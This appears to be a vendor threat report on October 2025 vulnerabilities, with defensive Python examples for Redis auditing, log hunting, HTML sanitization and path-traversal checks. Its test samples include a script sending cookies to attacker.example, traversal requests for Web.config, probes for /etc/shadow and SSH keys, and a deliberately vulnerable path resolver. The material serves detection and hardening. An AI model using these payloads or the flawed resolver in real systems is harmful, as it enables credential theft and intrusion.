October 2025 Threat Report
Just over 4,100 new CVEs emerged in October 2025, each representing new attack surface and placing pressure on defenders to identify and patch them. For operational resilience, organizations need to scan their IT infrastructure frequently and prioritize mitigation by exploitability and exposure.
A free trial of Greenbone’s OPENVAS BASIC lets defenders scan their enterprise IT estate and stay on top of emerging threats. The trial includes access to Greenbone’s OPENVAS ENTERPRISE FEED, delivering industry-leading coverage for CVEs and other IT security vulnerabilities. This month’s threat report will cover some of the most critical new vulnerabilities being actively exploited, and emerging high-risk CVEs with widespread exposure.

Oracle EBS Exploited in Two Separate Ransomware Campaigns
CVE-2025-61882 (CVSS 9.8, EPSS ~99th pctl) is an unauthenticated remote code execution (RCE) flaw in Oracle E-Business Suite (EBS), actively exploited since at least August 9, 2025 [1][2]. The CVE is being used in mass exploitation campaigns for data theft and extortion by the Cl0p ransomware [S0611] operator. Public PoC exploits appeared in early October and a detailed technical analysis is publicly available.
Besides CVE-2025-61882, CVE-2025-61884 (CVSS 7.5, EPSS ~93rd pctl), a Server-Side Request Forgery (SSRF) flaw [CWE-918] also in Oracle EBS, was actively exploited in October 2025. CVE-2025-61884 was added to CISA KEV and has been used to deploy ransomware [T1486]. The two campaigns differ in impact: attacks leveraging CVE-2025-61882 reportedly relied on data theft for extortion, whereas attacks exploiting CVE-2025-61884 have encrypted files for ransom impact.
Both CVEs received alerts from numerous national CERT entities globally [3][4][5][6][7][8][9][10]. Greenbone’s OPENVAS ENTERPRISE FEED includes an active check and a remote version check for CVE-2025-61882, and a remote version check for CVE-2025-61884, allowing defenders to identify vulnerable assets. According to Oracle’s official advisories [11][12], EBS versions 12.2.3 to 12.2.14 are affected.
Smartbedded Meteobridge Now Actively Exploited Via CVE-2025-4008
CVE-2025-4008 (CVSS 8.8, EPSS ~97th pctl), published on May 13, 2025, is an unauthenticated remote command injection vulnerability [CWE-77] in Smartbedded Meteobridge that is now actively exploited. The flaw resides in the template.cgi script of the Meteobridge web interface, which passes attacker-controlled input to eval() calls. Exploitation allows attackers to execute arbitrary commands as root on affected devices. Smartbedded Meteobridge is a gateway that connects personal weather stations to public networks. Shodan reveals roughly 70–130 devices exposed on the public internet.
A proof-of-concept (PoC) exploit and full technical write-up were published by ONEKEY, which discovered the flaw during firmware analysis. While the vendor’s official advisory claims that Internet exposure is a “precondition for exploiting any security vulnerability”, an attacker who has already gained a foothold on the internal network, or a malicious insider, can reach the device just as easily. Greenbone detects vulnerable instances of Smartbedded Meteobridge with an active check and a remote version check. Users should upgrade to version 6.2 or later.
RediShell: A 13-Year-Old Lua Flaw Allows RCE in Redis
CVE-2025-49844 (CVSS 9.9, EPSS ~90th pctl) allows authenticated RCE on all unpatched Redis instances with Lua scripting enabled. The flaw, nicknamed RediShell, is a use-after-free [CWE-416] in the Lua garbage collector that a crafted script can trigger. Note that “authenticated” is a weak precondition in practice: Lua scripting is enabled by default, and Redis ships without a password unless requirepass or ACLs are configured, so on an exposed instance any client that can reach the port can run EVAL.
Redis is prevalent in cloud environments and has been a hot target for cryptomining [T1496] and ransomware [T1486], leveraged by the P2PInfect, Redigo, HeadCrab and Migo malware families. A PoC exploit for CVE-2025-49844 confirms exploitability. Two additional Lua engine flaws were fixed alongside it:
- CVE-2025-46817 (CVSS 9.8, EPSS ~96th pctl): an integer overflow [CWE-190] in the Lua unpack() function.
- CVE-2025-46818 (CVSS 7.3, EPSS ~88th pctl): a code injection flaw [CWE-94] that allows an attacker to execute Lua scripts in the context of another user.
Multiple national security alerts have been issued for the CVEs [1][2][3][4][5][6]. OPENVAS ENTERPRISE FEED includes authenticated security checks to identify exposure across many Linux environments. Redis has issued a patch and additional mitigations can be found in the vendor’s official advisory.
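The configuration audit below is an added example (not Greenbone or Redis code) showing how to check a redis.conf offline for the three settings that decide whether the “authenticated” precondition of CVE-2025-49844 means anything: authentication, network exposure, and whether the default user can still reach EVAL/EVALSHA. It assumes the redis.conf directive syntax and the ACL rule grammar of Redis 6 and later; the two sample configurations are constructed for illustration.

```python
"""Offline audit of a redis.conf for the settings that turn the "authenticated"
precondition of CVE-2025-49844 into no precondition at all.

Added example, not Greenbone or Redis code. Assumes Redis 6+ directive and
ACL syntax; the two sample configurations below are constructed.
"""

EXPOSED_BINDS = {"0.0.0.0", "*", "::"}


def parse_conf(text):
    """Return (directive, args) tuples; full-line comments and blanks dropped.
    Directives such as bind, user and rename-command may repeat, so a list is
    kept rather than a dict. An empty quoted value ("") becomes ''."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = [p.strip('"\'') for p in line.split()]
        entries.append((parts[0].lower(), parts[1:]))
    return entries


def _default_user_rules(entries):
    """ACL rule tokens attached to 'user default ...' lines."""
    rules = []
    for directive, args in entries:
        if directive == "user" and args and args[0] == "default":
            rules.extend(args[1:])
    return rules


def audit_redis_conf(text):
    """Return human-readable findings; an empty list means the config neither
    exposes the port unauthenticated nor leaves scripting reachable."""
    entries = parse_conf(text)
    findings = []
    default_rules = _default_user_rules(entries)

    # 1. Authentication. Without requirepass or an ACL password (>plain or
    #    #sha256) on the default user, every client that reaches the port
    #    already satisfies the CVE's "authenticated" requirement.
    has_requirepass = any(d == "requirepass" and a and a[0] for d, a in entries)
    acl_password = any(r.startswith((">", "#")) for r in default_rules)
    if not has_requirepass and not acl_password:
        findings.append("no authentication: EVAL reachable by any client")

    # 2. Exposure. A wildcard bind or protected-mode off makes the instance
    #    reachable beyond loopback. protected-mode only kicks in when no bind
    #    and no password are set, so it is no substitute for check 1.
    exposed = [addr for d, a in entries if d == "bind" for addr in a if addr in EXPOSED_BINDS]
    if exposed:
        findings.append(f"bound to all interfaces ({', '.join(exposed)})")
    protected = [a[0].lower() for d, a in entries if d == "protected-mode" and a]
    if protected and protected[-1] == "no":
        findings.append("protected-mode disabled")

    # 3. Scripting surface. Keep EVAL/EVALSHA away from users who do not need
    #    them: an ACL '-@scripting' on the default user covers EVAL, EVALSHA,
    #    FCALL and FUNCTION, while the legacy rename-command trick only hides
    #    the commands it names.
    renamed_away = {a[0].upper() for d, a in entries
                    if d == "rename-command" and len(a) == 2 and a[1] == ""}
    scripting_blocked = "-@scripting" in (r.lower() for r in default_rules)
    if not scripting_blocked and not {"EVAL", "EVALSHA"} <= renamed_away:
        findings.append("Lua scripting reachable by default user (no -@scripting ACL, EVAL not disabled)")
    return findings


# Constructed samples: a container-style default and a hardened equivalent.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
port 6379
"""

HARDENED_CONF = """
bind 127.0.0.1 -::1
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
user default on >CHANGE-ME-long-random-secret ~* &* -@all +@read +@write -@scripting
"""

if __name__ == "__main__":
    for name, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_redis_conf(conf) or ["ok"])
```

Running it prints four findings for the weak configuration and “ok” for the hardened one. The ACL approach is preferable to rename-command because it also covers the Redis Functions commands and can be applied per user, so an application account that genuinely needs EVAL can keep it while the default user loses it.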
Emergency Out-of-Band Patch for Windows Server Update Service and More Microsoft Risks Emerge
Microsoft’s October security update disclosed a total of 201 new CVEs. Two were flagged as “Exploitation Detected” and 14 as “Exploitation more likely”. In addition to these disclosures, an emergency alert was issued by CISA for CVE-2025-59287, affecting the Windows Server Update Service (WSUS). Here are brief descriptions of the most high-risk emerging threats to Microsoft products:
- CVE-2025-59287 (CVSS 9.8, EPSS ~70th pctl): A flaw in WSUS allows an unauthenticated remote attacker to achieve RCE through deserialization of untrusted data [CWE-502]. Only servers with the WSUS Server Role enabled are affected, and the exposed service listens on the WSUS ports 8530/8531. Numerous national CERT alerts have been published, many referencing a public PoC exploit [1][2][3][4][5][6][7][8][9]. Microsoft’s official advisory also acknowledges that a PoC exploit exists.
- CVE-2025-33073 (CVSS 8.8, EPSS ~97th pctl): A Windows SMB vulnerability allows an authorized attacker to remotely achieve privilege escalation [CWE-284] to SYSTEM level. The flaw was added to CISA KEV.
- CVE-2025-59230 (CVSS 7.8, EPSS ~95th pctl): An elevation of privilege vulnerability [CWE-284] in the Windows Remote Access Connection Manager has been added to CISA KEV.
- CVE-2025-24990 (CVSS 7.8, EPSS ~91st pctl): The end-of-life (EOL) third party Agere Modem driver in Microsoft Windows is now considered actively exploited. The flaw is due to an untrusted pointer dereference [CWE-822] which can lead to arbitrary code execution.
- CVE-2025-55315 (CVSS 9.9): A security feature bypass vulnerability in ASP.NET Core can lead to HTTP request smuggling [CWE-444]. An authenticated attacker could exploit the flaw to bypass front-end security controls, hijack user sessions, or perform request-forgery attacks. A technical description is available, increasing the risk. See the official security advisory for affected versions and patches.
- CVE-2025-59502 (CVSS 7.5, EPSS ~81st pctl): An unauthenticated attacker can remotely induce uncontrolled resource consumption [CWE-400] in Windows Remote Procedure Call (RPC), resulting in Denial of Service (DoS). Microsoft classifies the CVE as “Exploitation More Likely”.
- CVE-2025-47827 (CVSS 4.6): Secure Boot can be bypassed because the igel-flash-driver module improperly verifies a cryptographic signature [CWE-347]. The flaw allows a malicious root filesystem to be mounted from an unverified SquashFS image. Although the vulnerability arises in IGEL OS, the affected bootloader is signed under Microsoft’s third-party UEFI CA, so the chain can be used to boot unverified code on any system that trusts that CA, which is why it appears in Microsoft’s release. Microsoft has flagged this flaw as actively exploited and a technical description with PoC exploit is available.
Greenbone provides robust detection for Microsoft’s recent security updates. The OPENVAS ENTERPRISE FEED includes detection for 156 (78%) of the 201 newly disclosed CVEs affecting Microsoft products.
Defenders Still “Living On the Edge”: Constant Flow of Perimeter Device Flaws
Greenbone’s June 2024 Threat Report first began tracking high-risk vulnerabilities in perimeter network devices. Since then, edge vulnerabilities have continued to surface unabated. In this section, we review emerging threats to the devices meant to protect internal networks from attack.
F5 Hack: Multiple New Vulnerabilities in F5 Products Disclosed
In October 2025, F5 disclosed that a “highly sophisticated nation-state” adversary had long-term, persistent access to its internal systems, indicating a dwell time of at least 12 months. The attackers stole BIG-IP source code and information about undisclosed vulnerabilities still in F5’s triage pipeline. The theft prompted the urgent publication of the CVEs that were being worked through that pipeline.
In total, 44 new CVEs were published for F5 products in October 2025, several of which were the subject of national CERT alerts [1][2][3][4][5][6][7][8][9][10]. Active exploitation has not been reported and no PoC exploits have been published. However, the stolen vulnerability details give the adversary a head start, and F5 vulnerabilities have repeatedly been used in ransomware attacks. In response, Greenbone added new security tests for F5 devices, covering 32 (73%) of the 44 new CVEs.
Fresh CVEs in Ivanti Products for Defenders to Patch
Trend Micro’s Zero Day Initiative (ZDI) publicly disclosed 14 unpatched vulnerabilities in Ivanti Endpoint Manager (EPM) after months of unsuccessful coordination with Ivanti. According to reports, Ivanti requested six months to address the flaws. ZDI’s disclosure effectively exposed these flaws as “zero-day” vulnerabilities, meaning attackers could now exploit them before patches are available.
Greenbone’s OPENVAS ENTERPRISE FEED includes detection tests for all 17 Ivanti CVEs disclosed in October 2025, covering both ZDI’s newly disclosed CVEs and those reported by other security researchers.
Fortinet’s Products Exposed to 32 New CVEs in October
In total, 32 CVEs were published for Fortinet products in October 2025. However, only 17 of these are listed on the vendor’s official advisory page. Greenbone added checks for 21 of the 32 new CVEs, providing high detection coverage for defenders using Fortinet devices. Fortinet has 20 CVEs listed in CISA’s KEV catalog; 13 of these are associated with ransomware attacks indicating high risk for customers.
Critical Unauthenticated RCE in WatchGuard Fireware OS
CVE-2025-9242 (CVSS 9.3, EPSS ~90th pctl) is an unauthenticated RCE flaw in WatchGuard Fireware OS, the operating system of the vendor’s firewall appliances that provides VPN gateway, policy enforcement and intrusion prevention (IPS) functions. watchTowr security researchers have published a technical description and PoC exploit, increasing the risk.
Several alerts have been issued by government agencies regarding CVE-2025-9242 [1][2][3]. The OPENVAS ENTERPRISE FEED includes a remote version check to identify affected appliances. Users should update to the fixed release for their branch (12.3.1_Update3, 12.5.13, 12.11.4 or 2025.1.1, or later) and review the vendor’s official advisory for more information.
CVE-2025-59978: Junos Space Flaw Lets Authenticated Attackers Inject Malicious Scripts
CVE-2025-59978 (CVSS 9.0) is a stored XSS flaw [CWE-79] in Juniper Networks’ Junos Space, a network management and orchestration platform that provides centralized management of Juniper’s routers, switches and security devices. The vulnerability lets a low-privileged authenticated attacker inject JavaScript <script> tags that execute with the privileges of an administrator who views the affected page. No active exploitation or public PoCs are yet known. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote version check to identify vulnerable instances. All Junos Space versions before 24.1R4 are affected. See the official security advisory for more information.
Local Privilege Escalation Flaw in VMware Exploited In-The-Wild
CVE-2025-41244 (CVSS 7.8), published in September 2025, is now flagged as actively exploited. Multiple sources have linked in-the-wild exploitation to UNC5174, a China-linked threat actor. The flaw is a local privilege escalation [CWE-284] that applies when VMware Tools is managed by Aria Operations with SDMP enabled. Successful exploitation allows an unprivileged local user to escalate to root on the same VM. A technical analysis and PoC exploit are available, increasing the risk.
The VMware platform has appeared on CISA KEV 26 times including this latest CVE; 8 of these entries indicate use in ransomware attacks. CERT advisories have been issued from various countries [1][2][3][4]. So far in 2025, a total of 40 CVEs have been issued across all VMware platforms. In response, Greenbone has added detection to both the OPENVAS ENTERPRISE FEED and COMMUNITY feed, covering 36 (90%) of VMware’s 2025 vulnerabilities.
To mitigate attacks, Windows users should update to VMware Tools 12.5.4 (Windows 32-bit: 12.4.9). Linux users should update to vendor-provided open-vm-tools. If you can’t patch immediately, disable SDMP and strictly limit guest access. Specific versions of VMware Aria Operations, VMware Tools, VMware Cloud Foundation, VMware Telco Cloud Platform and VMware Telco Cloud Infrastructure are affected. See the official advisory for more details.
Gladinet CentreStack Flaw Allows Machine Key Theft and RCE
CVE-2025-11371 (CVSS 9.8, EPSS ~89th pctl) is an unauthenticated Local File Inclusion (LFI) flaw [CWE-552] that allows remote attackers to read arbitrary files from Gladinet CentreStack and Triofox, including Web.config. In-the-wild attacks have been observed in which the LFI flaw was exploited to retrieve the ASP.NET machine key from Web.config and then forge ViewState payloads with it. For RCE, attackers then exploit ViewState deserialization, the same primitive behind CVE-2025-30406 (CVSS 9.8, EPSS ~99th pctl); with the stolen key, a forged ViewState passes MAC validation and is deserialized by the server. A detailed technical description and attack chain analysis is publicly available.
Greenbone’s OPENVAS ENTERPRISE FEED has included detection tests for both CVEs described above since April 2025 [1][2]. Gladinet has published patches to prevent exploitation. According to Gladinet’s official advisory, users who cannot patch immediately should disable the temp handler in UploadDownloadProxy’s Web.config to block the unauthenticated /storage/t.dn endpoint abused for LFI. Because any machine key that has already been read must be treated as compromised, rotating it after patching is also advisable.
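Defenders who cannot yet confirm whether their machine key was read can look back through web server logs. The script below is an added example (not Greenbone or Gladinet code) that hunts IIS W3C logs for requests to the /storage/t.dn handler named above and separates simple probes from requests that carry traversal sequences or name Web.config after URL-decoding. The log excerpt is constructed, its field list is the default IIS W3C extended format, and the query parameter name in the sample (s=) is illustrative, which is why the detection keys on the handler path and decoded markers rather than on a parameter name.

```python
"""Hunt IIS W3C logs for requests to the CentreStack/Triofox temp handler
(/storage/t.dn) that the CVE-2025-11371 exploitation chain abuses for LFI.

Added example, not Greenbone or Gladinet code. The log excerpt is constructed
(RFC 5737 addresses); the 's=' parameter name in it is illustrative.
"""
from urllib.parse import unquote

HANDLER_SUFFIX = "/storage/t.dn"
LFI_MARKERS = ("..", "web.config")


def parse_w3c(log_text):
    """Yield one dict per request, keyed by the names in the #Fields header.
    Rows whose column count does not match the header are skipped."""
    fields = None
    for raw in log_text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("log has no #Fields header")
        values = line.split()
        if len(values) != len(fields):
            continue
        yield dict(zip(fields, values))


def classify(request):
    """None for benign traffic, 'probe' for any hit on the handler, 'lfi' when
    the query also carries a traversal sequence or names Web.config after
    URL-decoding twice (catches %252e%252e double encoding)."""
    stem = request.get("cs-uri-stem", "").lower()
    if not stem.endswith(HANDLER_SUFFIX):
        return None
    query = request.get("cs-uri-query", "-")
    query = unquote(unquote(query)).lower() if query != "-" else ""
    if any(marker in query for marker in LFI_MARKERS):
        return "lfi"
    return "probe"


def hunt(log_text):
    """Return (verdict, client_ip, status, stem, query) per suspicious request."""
    hits = []
    for req in parse_w3c(log_text):
        verdict = classify(req)
        if verdict:
            hits.append((verdict, req.get("c-ip", "-"), req.get("sc-status", "-"),
                         req["cs-uri-stem"], req.get("cs-uri-query", "-")))
    return hits


# Constructed log excerpt: one LFI attempt that returned 200, one probe, noise.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2025-10-11 03:12:44 10.0.0.5 GET /portal/loginpage.aspx - 443 - 198.51.100.23 Mozilla/5.0 - 200 0 0 31
2025-10-11 03:13:02 10.0.0.5 GET /storage/t.dn s=..%2f..%2f..%2fUploadDownloadProxy%2fWeb.config 443 - 198.51.100.23 python-requests/2.32 - 200 0 0 12
2025-10-11 03:13:09 10.0.0.5 GET /storage/t.dn s=abc123 443 - 203.0.113.7 Mozilla/5.0 - 404 0 0 5
2025-10-11 03:14:00 10.0.0.5 POST /portal/loginpage.aspx - 443 - 198.51.100.23 python-requests/2.32 - 302 0 0 40
"""

if __name__ == "__main__":
    for hit in hunt(SAMPLE_LOG):
        print(*hit)
```

An 'lfi' verdict with a 200 status is the signal that matters: the read most likely succeeded, so the machine key should be treated as stolen and rotated after patching, and the same client address should be checked for follow-up POSTs carrying ViewState.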
Zimbra Zero-Day Used to Target Brazilian Military
CVE-2025-27915 (CVSS 5.4, EPSS ~97th pctl) is a stored cross-site scripting (XSS) vulnerability [CWE-79] in Zimbra Collaboration Suite (ZCS). The flaw is caused by insufficient sanitization of HTML content embedded in .ICS calendar files. As a result, attackers can launch phishing attacks with malicious .ICS calendar invites [T1566.001] to execute arbitrary JavaScript within a victim’s webmail session.
The CVE has been exploited in targeted attacks against the Brazilian military and added to CISA KEV. Belgium’s CERT.be has published a security advisory. ZCS is highly targeted by threat actors: CISA KEV contains 14 ZCS CVEs, five of them associated with ransomware attacks [T1486]. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable instances. The flaw affects ZCS versions 9.0, 10.0 and 10.1. Users should upgrade to the latest version and be especially cautious when handling calendar invites and other email attachments.
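To make the root cause concrete, the following is an added example (not Zimbra code) of the allowlist-based HTML sanitization that a webmail client must apply to HTML carried inside a calendar invite before rendering it. The allowlist and the sample invite body are constructed; a production deployment would use a maintained sanitizer library, but the logic shows what such a control has to remove: unknown tags, every event-handler attribute, and URL attributes with dangerous schemes.

```python
"""Allowlist-based HTML sanitizer of the kind that, per CVE-2025-27915, was
insufficient for HTML inside .ICS calendar invites in Zimbra.

Added example, not Zimbra code. The allowlist and sample body are constructed.
"""
from html import escape
from html.parser import HTMLParser

ALLOWED_TAGS = {"p", "br", "b", "i", "u", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}          # no on*, style, src or srcdoc anywhere
SAFE_URL_SCHEMES = ("http://", "https://", "mailto:")
VOID_TAGS = {"br"}
RAW_TEXT_TAGS = {"script", "style"}      # their text content is dropped as well


class AllowlistSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []
        self.skip_depth = 0              # >0 while inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth += 1
            return
        if tag not in ALLOWED_TAGS:
            return                       # drop img, iframe, form, input, svg...; keep their text
        kept = []
        for name, value in attrs:        # HTMLParser lowercases attribute names
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue                 # removes onerror=, onclick=, style=, ...
            value = (value or "").strip()
            if name == "href" and not value.lower().startswith(SAFE_URL_SCHEMES):
                continue                 # removes javascript:, data:, vbscript: URLs
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in RAW_TEXT_TAGS:
            self.skip_depth = max(0, self.skip_depth - 1)
        elif tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skip_depth:
            self.out.append(escape(data))   # re-escape decoded text so &lt;script&gt; stays inert


def sanitize(html):
    """Return HTML containing only allowlisted tags and attributes."""
    parser = AllowlistSanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed invite body mixing legitimate formatting with XSS vectors.
MALICIOUS_INVITE_HTML = (
    "<p>Team sync <b>moved</b> to 15:00.</p>"
    '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
    '<img src=x onerror="alert(document.domain)">'
    '<a href="javascript:alert(1)" onclick="steal()">agenda</a>'
    '<a href="https://intranet.example/agenda">agenda</a>'
    '<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;"></iframe>'
)

if __name__ == "__main__":
    print(sanitize(MALICIOUS_INVITE_HTML))
```

The output keeps the paragraph, the bold text and the https link, and nothing else survives. The design point is the direction of the filter: a denylist of known-bad tags misses the next vector (an unexpected element, a new event attribute, an encoded scheme), whereas an allowlist fails closed.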
Critical Kentico Xperience Flaws are Actively Exploited
CVE-2025-2746 and CVE-2025-2747 (both CVSS 9.8) allow unauthenticated remote attackers to gain full administrative control of Kentico Xperience via an authentication bypass [CWE-288] flaw. Both CVEs are actively exploited. Exploitation enables attackers to manipulate or exfiltrate CMS data and deploy malicious payloads with administrative privileges.
A full technical description and PoC exploits are publicly available, increasing the risk of broader exploitation. Multiple national CERT advisories have been published for the new CVEs [1][2][3]. The OPENVAS ENTERPRISE FEED includes an active check for CVE-2025-2746 and an active check and remote version check for CVE-2025-2747. CVE-2025-2746 affects versions through 13.0.172 and CVE-2025-2747 affects versions through 13.0.178; the vendor has published hotfixes for mitigation.
New High-Severity Flaw in Zoho ManageEngine ADManager Plus
CVE-2025-10020 (CVSS 8.8, EPSS ~73rd pctl) is an authenticated command injection vulnerability [CWE-77] in the Custom Script component of ManageEngine ADManager Plus. The flaw allows attackers with low-privileged access to gain arbitrary RCE. ManageEngine is a widely used on-prem solution for system administrators, IT operations teams, and security engineers to monitor, automate, and secure IT infrastructures.
Although no active exploitation, public technical description or PoC exploit has been reported, ManageEngine has historically attracted attention from cyber adversaries. This makes CVE-2025-10020 high risk when combined with stolen credentials or insider access, since only a low-privileged account is required. The ManageEngine platform is listed on CISA KEV nine times, twice for ransomware attacks (CVE-2022-47966 and CVE-2021-40539). Updating to build 8024 is strongly recommended.
The OPENVAS ENTERPRISE FEED provides:
- A remote version check to detect servers vulnerable to CVE-2025-10020
- Detection tests for all Zoho vulnerabilities listed in CISA KEV including CVE-2022-47966 and CVE-2021-40539 used in ransomware attacks [T1486]
- Detection tests for >70% of CVEs affecting Zohocorp products from 2021 onward
Flowise Server Gives Attackers RCE and Access to Secrets
CVE-2025-61913 (CVSS 9.9) is a path traversal flaw [CWE-22] in Flowise that lets low-privileged, authenticated attackers read and write arbitrary files, potentially leading to RCE. Flowise is a drag & drop user interface and backend server for building customized large language model (LLM) applications.
CVE-2025-61913 stems from improper validation of the file_path parameter in the WriteFileTool and ReadFileTool, which lets a traversal sequence or an absolute path escape the intended directory. The flaw enables access to sensitive files such as /root/.flowise/encryption.key and /root/.flowise/database.sqlite in Docker deployments, or /etc/passwd, /etc/shadow and /root/.ssh/id_rsa in non-Docker setups. The vendor has published a full PoC exploit in its own advisory, and at least one other PoC exploit exists [1]. However, in-the-wild exploitation has not been confirmed.
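The bug class is worth seeing side by side with its fix. The following is an added example, not Flowise code (Flowise is a Node.js project; the logic is shown here in Python): a resolver that joins the user-supplied file_path onto a base directory and trusts the result, next to one that canonicalises both sides and requires the target to sit strictly inside the base. BASE_DIR and the sample paths are illustrative; the probes reuse the Docker and non-Docker targets named above.

```python
"""Vulnerable vs hardened resolution of a user-supplied file_path, the bug
class behind CVE-2025-61913 in Flowise's ReadFileTool/WriteFileTool.

Added example, not Flowise code. BASE_DIR and the probes are illustrative.
"""
import os

BASE_DIR = "/srv/flowise-files"   # assumption: the only directory a file tool may touch


def resolve_vulnerable(base, file_path):
    """The bug class: join the user value onto base and trust the result.
    '../' sequences walk out of base, and os.path.join discards base entirely
    when file_path is absolute, so '/etc/shadow' comes back unchanged."""
    return os.path.normpath(os.path.join(base, file_path))


def resolve_hardened(base, file_path):
    """Canonicalise both sides and require the target to be strictly inside
    base. realpath also follows symlinks, so a link planted inside base that
    points at /root/.flowise is rejected too."""
    if not isinstance(file_path, str) or not file_path or "\x00" in file_path:
        raise ValueError("invalid file_path")
    root = os.path.realpath(base)
    candidate = os.path.realpath(os.path.join(root, file_path))
    if candidate == root or os.path.commonpath([root, candidate]) != root:
        raise PermissionError(f"file_path escapes {root}: {file_path!r}")
    return candidate


def escapes_base(base, file_path):
    """True if the hardened resolver refuses this file_path."""
    try:
        resolve_hardened(base, file_path)
    except (ValueError, PermissionError):
        return True
    return False


# Constructed probes: the Docker and non-Docker targets from the advisory plus
# one benign request.
PROBES = [
    "../../../root/.flowise/encryption.key",
    "/etc/shadow",
    "../../root/.ssh/id_rsa",
    "notes/today.txt",
]

if __name__ == "__main__":
    for probe in PROBES:
        print(f"{probe!r:42} vulnerable -> {resolve_vulnerable(BASE_DIR, probe):32}"
              f" hardened rejects: {escapes_base(BASE_DIR, probe)}")
```

Two details matter beyond the obvious `..` check: absolute input must be handled (a naive join silently replaces the base), and the containment test must run on the canonical path, otherwise a symlink inside the allowed directory defeats a string-prefix comparison.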
Several other new high-risk CVEs also impact Flowise Server:
- CVE-2025-26319 (CVSS 9.8): An unauthenticated arbitrary file upload vulnerability [CWE-22] in /api/v1/attachments. A complete technical description and PoC is available online increasing the risk.
- CVE-2025-61687 (CVSS 8.8): A file upload vulnerability [CWE-22] allows authenticated users to upload arbitrary files and persistently store malicious JavaScript web shells on the server, leading to RCE.
- CVE-2025-29192 (CVSS 6.1): Allows XSS [CWE-79] via FORM element and INPUT element when an admin views the chat log.
- CVE-2025-50538 (CVSS 6.1): Allows XSS [CWE-79] via IFRAME element when an admin views the chat log.
Germany’s BSI has issued WID-SEC alerts for all CVEs described above [2][3][4][5]. The OPENVAS ENTERPRISE FEED includes two remote version detection checks which address all aforementioned CVEs affecting Flowise [6][7][8]. Users should update to version 3.0.8 or later and disable ALLOW_BUILTIN_DEP during installation. See the vendor’s official advisory for more information.
CVE-2025-37729: Critical RCE Vulnerability in Elastic Cloud Enterprise
CVE-2025-37729 (CVSS 9.1) in Elastic Cloud Enterprise (ECE) allows authenticated attackers with admin privileges to achieve RCE. The root cause is improper handling of Jinjava template expressions, which can be abused to execute arbitrary code and exfiltrate sensitive data. Because admin privileges are required, the vulnerability is primarily an insider or post-compromise threat, particularly in hybrid and multi-cloud environments where ECE is deployed. Spain’s INCIBE CERT has issued a security alert. Greenbone’s OPENVAS ENTERPRISE FEED includes a remote banner check to identify vulnerable instances. According to the vendor’s official advisory, versions 2.5.0 through 3.8.1 and 4.0.0 through 4.0.1 are affected.
Summary
The October 2025 Threat Report only scratches the surface of the new software flaws that emerged in the past month, and of OPENVAS SECURITY INTELLIGENCE’s ability to detect them. October 2025 saw over 4,100 new CVEs and novel cyber attack campaigns leveraging both fresh vulnerabilities and already known ones. This past month, high-impact flaws drove ransomware, data theft and operational downtime, leading to attempts at corporate extortion and lost revenue. Greenbone’s OPENVAS BASIC free trial plus the OPENVAS ENTERPRISE FEED include detection modules for many emerging and legacy CVEs, helping security teams find, triage and fix vulnerable IT assets.
Joseph has had a varied and passionate background in IT and cyber security since the late 1980s. His early technical experience included working on an IBM PS/2, assembling PCs and programming in C++.
He also pursued academic studies in computer and systems engineering, anthropology and an MBA in technology forecasting.
Joseph has worked in data analytics, software development and, in particular, enterprise IT security. He specialises in vulnerability management, encryption and penetration testing.